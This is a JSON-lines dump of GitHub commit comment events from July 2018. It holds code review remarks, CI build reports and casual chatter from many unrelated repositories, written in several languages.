{"id":"8031419345","type":"CommitCommentEvent","actor":{"login":"NguyenSonArsenal"},"repo":{"name":"vuonghieu95/news_crud_laravel"},"payload":{"comment":{"id":29865644,"position":30,"line":30,"path":"CRUD/app/User.php","commit_id":"26fe4b5fe085b2cb18025cb53c34d2d9eb5355fa","created_at":"2018-07-28T01:19:37Z","updated_at":"2018-07-28T01:19:37Z","author_association":"NONE","body":"Về model, tạo 1 foder model riêng, cho tất cả các model vào đó.\r\nModel User.php dùng để login bên phía người dùng\r\nModel Admin.php dùng để login bên phía admin.\r\nKhông được dùng login chung cả admin vs user vào bảng user được. Về lý thuyết thì k sai, nhưng k ai làm thế cả."}},"created_at":"2018-07-28T01:19:37Z"}
{"id":"8031420608","type":"CommitCommentEvent","actor":{"login":"hangcoffee"},"repo":{"name":"hangcoffee/hello-world"},"payload":{"comment":{"id":29865646,"position":null,"line":null,"path":null,"commit_id":"74ffbe8c337f35842dd9b9a87bea9da73135cfe1","created_at":"2018-07-28T01:20:32Z","updated_at":"2018-07-28T01:20:32Z","author_association":"OWNER","body":"往后边追加一句话，试试咋样"}},"created_at":"2018-07-28T01:20:32Z"}
{"id":"8031420924","type":"CommitCommentEvent","actor":{"login":"hangcoffee"},"repo":{"name":"hangcoffee/hello-world"},"payload":{"comment":{"id":29865649,"position":2,"line":2,"path":"README.md","commit_id":"74ffbe8c337f35842dd9b9a87bea9da73135cfe1","created_at":"2018-07-28T01:20:47Z","updated_at":"2018-07-28T01:20:47Z","author_association":"OWNER","body":"my first demo++"}},"created_at":"2018-07-28T01:20:47Z"}
{"id":"8031421619","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865656,"position":null,"line":null,"path":null,"commit_id":"d26e48bf0524cbfdb192d6c154200625d7127141","created_at":"2018-07-28T01:21:19Z","updated_at":"2018-07-28T01:21:19Z","author_association":"NONE","body":"issue-6790-VRP-D-term (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2945 of 2948 tests passed, 2 test warnings)\n\nMessages:\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 4 tests had: Table small diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: AUD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-28T01:21:19Z"}
{"id":"8031432868","type":"CommitCommentEvent","actor":{"login":"LeonineKing1199"},"repo":{"name":"jadr2ddude/cxxstuff"},"payload":{"comment":{"id":29865680,"position":29,"line":29,"path":"headers.cpp","commit_id":"4b7437f130817e667c828b7e847105d9d8c7cbc4","created_at":"2018-07-28T01:30:07Z","updated_at":"2018-07-28T01:30:07Z","author_association":"NONE","body":"`name` should be a `std::string const` or `std::string const&`."}},"created_at":"2018-07-28T01:30:07Z"}
{"id":"8031433351","type":"CommitCommentEvent","actor":{"login":"LeonineKing1199"},"repo":{"name":"jadr2ddude/cxxstuff"},"payload":{"comment":{"id":29865683,"position":21,"line":21,"path":"headers.cpp","commit_id":"4b7437f130817e667c828b7e847105d9d8c7cbc4","created_at":"2018-07-28T01:30:25Z","updated_at":"2018-07-28T01:30:25Z","author_association":"NONE","body":"name should be a std::string const or std::string const&."}},"created_at":"2018-07-28T01:30:25Z"}
{"id":"8031434543","type":"CommitCommentEvent","actor":{"login":"iketeru"},"repo":{"name":"iketeru/Hello-World"},"payload":{"comment":{"id":29865686,"position":4,"line":4,"path":"README.md","commit_id":"54644bcaf247cdf32ce4a6039f16eaaa1777bb64","created_at":"2018-07-28T01:31:14Z","updated_at":"2018-07-28T01:31:14Z","author_association":"OWNER","body":"いいね\r\n"}},"created_at":"2018-07-28T01:31:14Z"}
{"id":"8031440339","type":"CommitCommentEvent","actor":{"login":"helloraven"},"repo":{"name":"msolorzano81/final"},"payload":{"comment":{"id":29865708,"position":null,"line":null,"path":null,"commit_id":"7290276656ef6b662d3ac8dcf71f6b278893777a","created_at":"2018-07-28T01:35:36Z","updated_at":"2018-07-28T01:35:36Z","author_association":"COLLABORATOR","body":"sure"}},"created_at":"2018-07-28T01:35:36Z"}
{"id":"8031440478","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865710,"position":null,"line":null,"path":null,"commit_id":"5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3","created_at":"2018-07-28T01:35:42Z","updated_at":"2018-07-28T01:35:42Z","author_association":"NONE","body":"Myoldmopar-patch-1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T01:35:42Z"}
{"id":"8031440503","type":"CommitCommentEvent","actor":{"login":"ZeroChaos-"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29865711,"position":null,"line":null,"path":null,"commit_id":"344bf164516e8a75d9253bd79ee6c8436ba6e9f7","created_at":"2018-07-28T01:35:44Z","updated_at":"2018-07-28T01:35:44Z","author_association":"CONTRIBUTOR","body":"I am well aware it breaks repoman.  Is there a new policy that I should be\naware of where we care about that?  Visibility rules are maintained in\npentoo by our profile, especially since I can't trivially change things in\ngentoo.\n\nOn Fri, Jul 27, 2018 at 8:57 PM Anton Bolshakov <notifications@github.com>\nwrote:\n\n> And your next commit too\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/pentoo/pentoo-overlay/commit/344bf164516e8a75d9253bd79ee6c8436ba6e9f7#commitcomment-29865528>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABl--XQ2DB6-YJRj_y_WSjPnpxwfKD20ks5uK7bdgaJpZM4Vk1Rp>\n> .\n>\n"}},"created_at":"2018-07-28T01:35:44Z"}
{"id":"8031441033","type":"CommitCommentEvent","actor":{"login":"LeonineKing1199"},"repo":{"name":"jadr2ddude/cxxstuff"},"payload":{"comment":{"id":29865714,"position":13,"line":13,"path":"headers.cpp","commit_id":"4b7437f130817e667c828b7e847105d9d8c7cbc4","created_at":"2018-07-28T01:36:10Z","updated_at":"2018-07-28T01:36:10Z","author_association":"NONE","body":"I recommend using `auto` here instead of `std::vector<std::string>::iterator`"}},"created_at":"2018-07-28T01:36:10Z"}
{"id":"8031443131","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865723,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-28T01:37:50Z","updated_at":"2018-07-28T01:37:50Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.png)</a> \n"}},"created_at":"2018-07-28T01:37:50Z"}
{"id":"8031443881","type":"CommitCommentEvent","actor":{"login":"hangcoffee"},"repo":{"name":"hangcoffee/hello-world"},"payload":{"comment":{"id":29865727,"position":null,"line":null,"path":null,"commit_id":"a5945c9cef11f219e0992a3d06993496f2520b74","created_at":"2018-07-28T01:38:26Z","updated_at":"2018-07-28T01:38:26Z","author_association":"OWNER","body":"666"}},"created_at":"2018-07-28T01:38:26Z"}
{"id":"8031446177","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"mrocklin/blog"},"payload":{"comment":{"id":29865736,"position":83,"line":83,"path":"_posts/work/2018-07-08-protocols-pickle.md","commit_id":"fc67559c5b609a924808918aa32a21a81192af50","created_at":"2018-07-28T01:40:17Z","updated_at":"2018-07-28T01:40:17Z","author_association":"NONE","body":"Maybe \"(up to a memory copy)\"?"}},"created_at":"2018-07-28T01:40:17Z"}
{"id":"8031446430","type":"CommitCommentEvent","actor":{"login":"NewGen66"},"repo":{"name":"dillbyrne/random-agent-spoofer"},"payload":{"comment":{"id":29865737,"position":null,"line":null,"path":null,"commit_id":"a6b50ff75a852ab86b281c5cfea7519ba155a0b7","created_at":"2018-07-28T01:40:28Z","updated_at":"2018-07-28T01:40:28Z","author_association":"NONE","body":"Hi\r\nI am planning to use it for older firefox versions\r\nsay firefox 55\r\n\r\nCould you update the latest version with new browser profiles.\r\n\r\nThanks"}},"created_at":"2018-07-28T01:40:28Z"}
{"id":"8031448195","type":"CommitCommentEvent","actor":{"login":"tallclair"},"repo":{"name":"kubernetes/community"},"payload":{"comment":{"id":29865744,"position":13,"line":13,"path":"committee-steering/governance/sig-charter-template.md","commit_id":"32d184cee2ecb7c72f9de75e687f4a88f7c36413","created_at":"2018-07-28T01:41:54Z","updated_at":"2018-07-28T01:41:54Z","author_association":"MEMBER","body":"I don't like cross linking specific lines like this. We have a choice between the line being out of date (as things are added or removed) or the content being out of date (by linking to a specific commit)."}},"created_at":"2018-07-28T01:41:54Z"}
{"id":"8031448659","type":"CommitCommentEvent","actor":{"login":"LeonineKing1199"},"repo":{"name":"jadr2ddude/cxxstuff"},"payload":{"comment":{"id":29865746,"position":5,"line":5,"path":"srv.h","commit_id":"4b7437f130817e667c828b7e847105d9d8c7cbc4","created_at":"2018-07-28T01:42:18Z","updated_at":"2018-07-28T01:42:18Z","author_association":"NONE","body":"I'm sure it's fine but I recommend putting all your includes inside your header guard."}},"created_at":"2018-07-28T01:42:18Z"}
{"id":"8031450762","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"mrocklin/blog"},"payload":{"comment":{"id":29865757,"position":104,"line":104,"path":"_posts/work/2018-07-08-protocols-pickle.md","commit_id":"fc67559c5b609a924808918aa32a21a81192af50","created_at":"2018-07-28T01:43:57Z","updated_at":"2018-07-28T01:43:57Z","author_association":"NONE","body":"Suspect this is also caused by a lack of knowledge as to what best practices with Pickle should be. For instance, they knew here writing to a file was reasonably fast. The fix you proposed is writing to a buffer that is then sent over the wire, which is very similar. Highlighting that may also be good here. Though leave that up to you."}},"created_at":"2018-07-28T01:43:57Z"}
{"id":"8031451187","type":"CommitCommentEvent","actor":{"login":"LeonineKing1199"},"repo":{"name":"jadr2ddude/cxxstuff"},"payload":{"comment":{"id":29865760,"position":null,"line":null,"path":null,"commit_id":"4b7437f130817e667c828b7e847105d9d8c7cbc4","created_at":"2018-07-28T01:44:16Z","updated_at":"2018-07-28T01:44:16Z","author_association":"NONE","body":"Overall, I think using a `vector<string>` is worse for performance than storing a single `string`. This reduces your code to `std::map<std::string, std::string>` and then requires you to parse the string for the values. This is okay as you can parse into `std::vector<std::string_view>` which is machine-efficient."}},"created_at":"2018-07-28T01:44:16Z"}
{"id":"8031452906","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/gidgethub-feedstock"},"payload":{"comment":{"id":29865769,"position":null,"line":null,"path":null,"commit_id":"a418c0c4f2233982c6e9d42209b0f4be4c9b5f83","created_at":"2018-07-28T01:45:35Z","updated_at":"2018-07-28T01:45:35Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @asmeurer was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T01:45:35Z"}
{"id":"8031453303","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29865772,"position":null,"line":null,"path":null,"commit_id":"344bf164516e8a75d9253bd79ee6c8436ba6e9f7","created_at":"2018-07-28T01:45:55Z","updated_at":"2018-07-28T01:45:55Z","author_association":"CONTRIBUTOR","body":"Yes, there is a  new policy :-) . You can add ** to the proper arch profile like it used to be instead of the of make it worst intentionally"}},"created_at":"2018-07-28T01:45:55Z"}
{"id":"8031455672","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29865782,"position":null,"line":null,"path":null,"commit_id":"01764c94c4610c3772c3d49825905c4bc020bdca","created_at":"2018-07-28T01:47:35Z","updated_at":"2018-07-28T01:47:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [change objects to the objects of the API response to update \"update time\".](https://trello.com/c/G8HFMp2Z/53-change-objects-to-the-objects-of-the-api-response-to-update-update-time)"}},"created_at":"2018-07-28T01:47:35Z"}
{"id":"8031456551","type":"CommitCommentEvent","actor":{"login":"blshkv"},"repo":{"name":"pentoo/pentoo-overlay"},"payload":{"comment":{"id":29865783,"position":null,"line":null,"path":null,"commit_id":"344bf164516e8a75d9253bd79ee6c8436ba6e9f7","created_at":"2018-07-28T01:48:09Z","updated_at":"2018-07-28T01:48:09Z","author_association":"CONTRIBUTOR","body":"There is an obvious advantage of it. It allows to see which ebuild need to be tested and keyworded at particular arch instead of faking it"}},"created_at":"2018-07-28T01:48:09Z"}
{"id":"8031460450","type":"CommitCommentEvent","actor":{"login":"gedanziger"},"repo":{"name":"norestlabs/mousexplore-vcoins"},"payload":{"comment":{"id":29865798,"position":10,"line":10,"path":"Neo/services/cron.service.addr.js","commit_id":"71090f6231936f91d93f65eac34f627f9f9efbe7","created_at":"2018-07-28T01:51:12Z","updated_at":"2018-07-28T01:51:12Z","author_association":"MEMBER","body":"Do other crons need switch to new log?"}},"created_at":"2018-07-28T01:51:12Z"}
{"id":"8031461831","type":"CommitCommentEvent","actor":{"login":"aymanbagabas"},"repo":{"name":"aymanbagabas/aymanbagabas.github.io"},"payload":{"comment":{"id":29865805,"position":9,"line":9,"path":"_posts/2018/2018-07-23-archlinux-on-matebook-x-pro.md","commit_id":"e0034bc85b8d9f5a0f20f59fb19ceeaf14aa35f8","created_at":"2018-07-28T01:52:20Z","updated_at":"2018-07-28T01:52:20Z","author_association":"OWNER","body":"Cool I got it working! Thanks, I'll update the blog post soon."}},"created_at":"2018-07-28T01:52:20Z"}
{"id":"8031462527","type":"CommitCommentEvent","actor":{"login":"Joedang"},"repo":{"name":"psas/lv3.1-airframe"},"payload":{"comment":{"id":29865806,"position":null,"line":null,"path":null,"commit_id":"91f7d3cca46b36b8dfe25f0ab5dc70111f5caab3","created_at":"2018-07-28T01:52:57Z","updated_at":"2018-07-28T01:52:57Z","author_association":"MEMBER","body":"I should really just unset Chris as the author for the EPL CAD station. Changing the author for the most recent commit is easy. Changing it for a parent commit is... less so. "}},"created_at":"2018-07-28T01:52:57Z"}
{"id":"8032023909","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29867730,"position":null,"line":null,"path":null,"commit_id":"d26e48bf0524cbfdb192d6c154200625d7127141","created_at":"2018-07-28T10:02:33Z","updated_at":"2018-07-28T10:02:33Z","author_association":"NONE","body":"issue-6790-VRP-D-term (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T10:02:33Z"}
{"id":"8032028768","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867736,"position":null,"line":null,"path":null,"commit_id":"56e7b909bf2e8d6022e6d906ed42823ec683c927","created_at":"2018-07-28T10:06:29Z","updated_at":"2018-07-28T10:06:29Z","author_association":"MEMBER","body":"Well idk what happened, but my regular GHD base color is mostly broken with this last update, the usercss was fine ;)\r\n\r\nall of the base colors are like this in GHD\r\n\r\n![capture](https://user-images.githubusercontent.com/31389848/43355513-537f9700-9255-11e8-9593-d2f1999ab397.PNG)\r\n\r\nmaybe change was too big, of USO broke or if it was Stylus.\r\n\r\n>This blows up the line count by 300% and style size by around 50%\r\n\r\nInsane not surprised there cause its separating into separate rules some or all selectors hat were in one rule, LIke body has one for BG and one for color.\r\n\r\nI think if this fixes something, you can turn this off and now manually wrangle it in from this point forward if it makes sense?\r\n\r\n\r\n"}},"created_at":"2018-07-28T10:06:29Z"}
{"id":"8032029440","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29867740,"position":49,"line":97,"path":"QieGaoWorld/views/login.py","commit_id":"e3c202f5cdff086042819f96a4ba9b62c1c92c90","created_at":"2018-07-28T10:07:05Z","updated_at":"2018-07-28T10:07:05Z","author_association":"OWNER","body":"少了else 不是管理员的情况。"}},"created_at":"2018-07-28T10:07:05Z"}
{"id":"8032032431","type":"CommitCommentEvent","actor":{"login":"carstene1ns"},"repo":{"name":"rock88/pcsx_rearmed"},"payload":{"comment":{"id":29867743,"position":18,"line":55,"path":"switch/source/main.c","commit_id":"087f3d09be8b924971017210dc5e08d9b79f5964","created_at":"2018-07-28T10:09:47Z","updated_at":"2018-07-28T10:09:47Z","author_association":"NONE","body":"Few problems here:\r\n- This will not take aspect ratio into account.\r\n- No need to shutdown the whole gfx subsystem, this may cause problems."}},"created_at":"2018-07-28T10:09:47Z"}
{"id":"8032034276","type":"CommitCommentEvent","actor":{"login":"dimamuha637296"},"repo":{"name":"uspehcoursbrest/MuhaGroupProject"},"payload":{"comment":{"id":29867745,"position":1,"line":1,"path":"index.html","commit_id":"edc1cf4079811d9f2512508d8e830c5dc31be60a","created_at":"2018-07-28T10:11:21Z","updated_at":"2018-07-28T10:11:21Z","author_association":"COLLABORATOR","body":"Начало"}},"created_at":"2018-07-28T10:11:21Z"}
{"id":"8032034873","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867746,"position":null,"line":null,"path":null,"commit_id":"25080c15c4b493f25d45dd752321c698f1641524","created_at":"2018-07-28T10:11:56Z","updated_at":"2018-07-28T10:11:56Z","author_association":"MEMBER","body":"Well idk what happened, but my regular GHD base color is mostly broken with this last update, the usercss was fine ;)\r\n\r\nall of the base colors are like this in GHD\r\n\r\n![capture](https://user-images.githubusercontent.com/31389848/43355513-537f9700-9255-11e8-9593-d2f1999ab397.PNG)\r\n\r\nmaybe change was too big, of USO broke or if it was Stylus."}},"created_at":"2018-07-28T10:11:56Z"}
{"id":"8032035170","type":"CommitCommentEvent","actor":{"login":"carstene1ns"},"repo":{"name":"rock88/pcsx_rearmed"},"payload":{"comment":{"id":29867747,"position":54,"line":14,"path":"switch/source/pixels_operation.c","commit_id":"087f3d09be8b924971017210dc5e08d9b79f5964","created_at":"2018-07-28T10:12:10Z","updated_at":"2018-07-28T10:12:10Z","author_association":"NONE","body":"You mixed up red and blue component here."}},"created_at":"2018-07-28T10:12:10Z"}
{"id":"8032035283","type":"CommitCommentEvent","actor":{"login":"difuer-yl"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29867748,"position":49,"line":97,"path":"QieGaoWorld/views/login.py","commit_id":"e3c202f5cdff086042819f96a4ba9b62c1c92c90","created_at":"2018-07-28T10:12:15Z","updated_at":"2018-07-28T10:12:15Z","author_association":"COLLABORATOR","body":"我原始版本是有的，你改on_server的时候删掉了"}},"created_at":"2018-07-28T10:12:15Z"}
{"id":"8032036023","type":"CommitCommentEvent","actor":{"login":"difuer-yl"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29867750,"position":49,"line":97,"path":"QieGaoWorld/views/login.py","commit_id":"e3c202f5cdff086042819f96a4ba9b62c1c92c90","created_at":"2018-07-28T10:12:55Z","updated_at":"2018-07-28T10:12:55Z","author_association":"COLLABORATOR","body":"![image](https://user-images.githubusercontent.com/16017414/43355612-d4ed845a-9291-11e8-839c-d59f679af271.png)\r\n"}},"created_at":"2018-07-28T10:12:55Z"}
{"id":"8032036348","type":"CommitCommentEvent","actor":{"login":"heisenberg-pb"},"repo":{"name":"heisenberg-pb/fcc-pomodoro-clock"},"payload":{"comment":{"id":29867755,"position":null,"line":null,"path":null,"commit_id":"087bd962bf806db696c4c29a27c2657699e2a884","created_at":"2018-07-28T10:13:13Z","updated_at":"2018-07-28T10:13:13Z","author_association":"OWNER","body":"Codepen link updated"}},"created_at":"2018-07-28T10:13:13Z"}
{"id":"8032036425","type":"CommitCommentEvent","actor":{"login":"YawenSun123"},"repo":{"name":"YawenSun123/Community-Detection"},"payload":{"comment":{"id":29867756,"position":null,"line":null,"path":null,"commit_id":"d789eb6fc440cba7d8c7723be91f8bc2e0ea6594","created_at":"2018-07-28T10:13:16Z","updated_at":"2018-07-28T10:13:16Z","author_association":"OWNER","body":"GA-Net"}},"created_at":"2018-07-28T10:13:16Z"}
{"id":"8032036477","type":"CommitCommentEvent","actor":{"login":"carstene1ns"},"repo":{"name":"rock88/pcsx_rearmed"},"payload":{"comment":{"id":29867757,"position":null,"line":null,"path":null,"commit_id":"087f3d09be8b924971017210dc5e08d9b79f5964","created_at":"2018-07-28T10:13:19Z","updated_at":"2018-07-28T10:13:19Z","author_association":"NONE","body":"Further suggestion: drop the immediate buffer and draw to the framebuffer directly."}},"created_at":"2018-07-28T10:13:19Z"}
{"id":"8032037829","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867760,"position":null,"line":null,"path":null,"commit_id":"25080c15c4b493f25d45dd752321c698f1641524","created_at":"2018-07-28T10:14:30Z","updated_at":"2018-07-28T10:14:30Z","author_association":"MEMBER","body":"Well the header is missing\r\n\r\n```\r\n/*! Github Dark v1.20.59 (2018-07-28) */\r\n  /* Repository: https://github.com/StylishThemes/GitHub-Dark    */\r\n  /* Userstyle:  http://userstyles.org/styles/37035              */\r\n/* License:    https://creativecommons.org/licenses/by-sa/4.0/ */\r\n```\r\n\r\nSo maybe the USO update went tits up."}},"created_at":"2018-07-28T10:14:30Z"}
{"id":"8032037868","type":"CommitCommentEvent","actor":{"login":"uekichi"},"repo":{"name":"uekichi/assessment"},"payload":{"comment":{"id":29867761,"position":null,"line":null,"path":null,"commit_id":"ad84b4d632cf53e8fda22ff5663d133ffef6405b","created_at":"2018-07-28T10:14:33Z","updated_at":"2018-07-28T10:14:33Z","author_association":"OWNER","body":"e62ed0a　対応しました"}},"created_at":"2018-07-28T10:14:33Z"}
{"id":"8032038674","type":"CommitCommentEvent","actor":{"login":"yyhaxx"},"repo":{"name":"HcySunYang/vue-design"},"payload":{"comment":{"id":29867770,"position":null,"line":null,"path":null,"commit_id":"30c8b7d97f48aec1ecc4a0b63e737fbee4babac8","created_at":"2018-07-28T10:15:12Z","updated_at":"2018-07-28T10:15:12Z","author_association":"NONE","body":"src目录中import导入模块时使用别名和script/config.js使用alias的原理有点不一样"}},"created_at":"2018-07-28T10:15:12Z"}
{"id":"8032039622","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867773,"position":null,"line":null,"path":null,"commit_id":"25080c15c4b493f25d45dd752321c698f1641524","created_at":"2018-07-28T10:15:56Z","updated_at":"2018-07-28T10:15:56Z","author_association":"MEMBER","body":"Yes, their shitty webserver cut off my publish again, republishing."}},"created_at":"2018-07-28T10:15:56Z"}
{"id":"8032041575","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867777,"position":null,"line":null,"path":null,"commit_id":"25080c15c4b493f25d45dd752321c698f1641524","created_at":"2018-07-28T10:17:40Z","updated_at":"2018-07-28T10:17:40Z","author_association":"MEMBER","body":"Should work now, hopefully."}},"created_at":"2018-07-28T10:17:40Z"}
{"id":"8032041794","type":"CommitCommentEvent","actor":{"login":"Nef1986"},"repo":{"name":"Nef1986/Elvui_Two_Pixel"},"payload":{"comment":{"id":29867778,"position":null,"line":null,"path":null,"commit_id":"880bb62eb9b6f61a200f51bd02dee4095fc064c3","created_at":"2018-07-28T10:17:52Z","updated_at":"2018-07-28T10:17:52Z","author_association":"OWNER","body":"\r\nAdd"}},"created_at":"2018-07-28T10:17:52Z"}
{"id":"8032044505","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867789,"position":null,"line":null,"path":null,"commit_id":"56e7b909bf2e8d6022e6d906ed42823ec683c927","created_at":"2018-07-28T10:20:04Z","updated_at":"2018-07-28T10:20:04Z","author_association":"MEMBER","body":"Not much optimization left here, except removing as many generator mappings as possible, and re-using colors where possible. I see this as an important step to a fully generated style."}},"created_at":"2018-07-28T10:20:04Z"}
{"id":"8032044588","type":"CommitCommentEvent","actor":{"login":"zy4"},"repo":{"name":"proteinevolution/Toolkit"},"payload":{"comment":{"id":29867791,"position":null,"line":null,"path":null,"commit_id":"39e2953676012e69eaea558aeecdd732dca4c6d5","created_at":"2018-07-28T10:20:08Z","updated_at":"2018-07-28T10:20:08Z","author_association":"MEMBER","body":"/cc @felixgabler you can reference the issues with \"closes #631: commitmessage\" to autoclose the issues."}},"created_at":"2018-07-28T10:20:08Z"}
{"id":"8032044887","type":"CommitCommentEvent","actor":{"login":"matthiaskrgr"},"repo":{"name":"rust-lang-nursery/rust-clippy"},"payload":{"comment":{"id":29867794,"position":null,"line":null,"path":null,"commit_id":"dd0ed5dccc93c9395bf5d9490ac49f7764069de1","created_at":"2018-07-28T10:20:20Z","updated_at":"2018-07-28T10:20:20Z","author_association":"CONTRIBUTOR","body":"This leaves the 2 branches of the check() function identical which is confusing me a bit, is this something that can be cleaned up?"}},"created_at":"2018-07-28T10:20:20Z"}
{"id":"8032058071","type":"CommitCommentEvent","actor":{"login":"shubhbairwa"},"repo":{"name":"shubhbairwa/JAVA-project"},"payload":{"comment":{"id":29867829,"position":null,"line":null,"path":null,"commit_id":"e375ad7e5632ea3a028b10bf5685a5d37c8792ec","created_at":"2018-07-28T10:32:01Z","updated_at":"2018-07-28T10:32:01Z","author_association":"OWNER","body":"Hey everyone,\r\nThis is actually a QUIZ GAME  for those people who said that they are the big fan of this series.The name of this series is F.R.I.E.N.D.S. this series have six main character 3 women(Rachel,Monica,Phoebe) & 3 men(Joey,Ross,Chandler).For more info watch it.\r\nRoll the series.\r\nSo this game contain six question and how to answer these question is provided in the game.\r\nSo....  BEST OF LUCK!!\r\n  "}},"created_at":"2018-07-28T10:32:01Z"}
{"id":"8032059406","type":"CommitCommentEvent","actor":{"login":"diskooooo"},"repo":{"name":"saltyskip/proposals"},"payload":{"comment":{"id":29867831,"position":18,"line":24,"path":"NEP.mediawiki","commit_id":"2f9b8e2ad7aa4f9595233833559977c483c4f235","created_at":"2018-07-28T10:33:10Z","updated_at":"2018-07-28T10:33:10Z","author_association":"NONE","body":"Typo: `apam` > `spam`"}},"created_at":"2018-07-28T10:33:10Z"}
{"id":"8032060040","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29867833,"position":null,"line":null,"path":null,"commit_id":"56e7b909bf2e8d6022e6d906ed42823ec683c927","created_at":"2018-07-28T10:33:42Z","updated_at":"2018-07-28T10:33:42Z","author_association":"MEMBER","body":"Well let's say 95% generated. There will always be cases where one wants to deviate from a color -> color mapping."}},"created_at":"2018-07-28T10:33:42Z"}
{"id":"8032062510","type":"CommitCommentEvent","actor":{"login":"Readock"},"repo":{"name":"BrotBerserker/InflectionPoint"},"payload":{"comment":{"id":29867841,"position":null,"line":null,"path":null,"commit_id":"da2b1fe650338633ca58901726a3ceb371977478","created_at":"2018-07-28T10:35:51Z","updated_at":"2018-07-28T10:35:51Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Siegerehrung: HUD](https://trello.com/c/z9Lxr10w/161-siegerehrung-hud)"}},"created_at":"2018-07-28T10:35:51Z"}
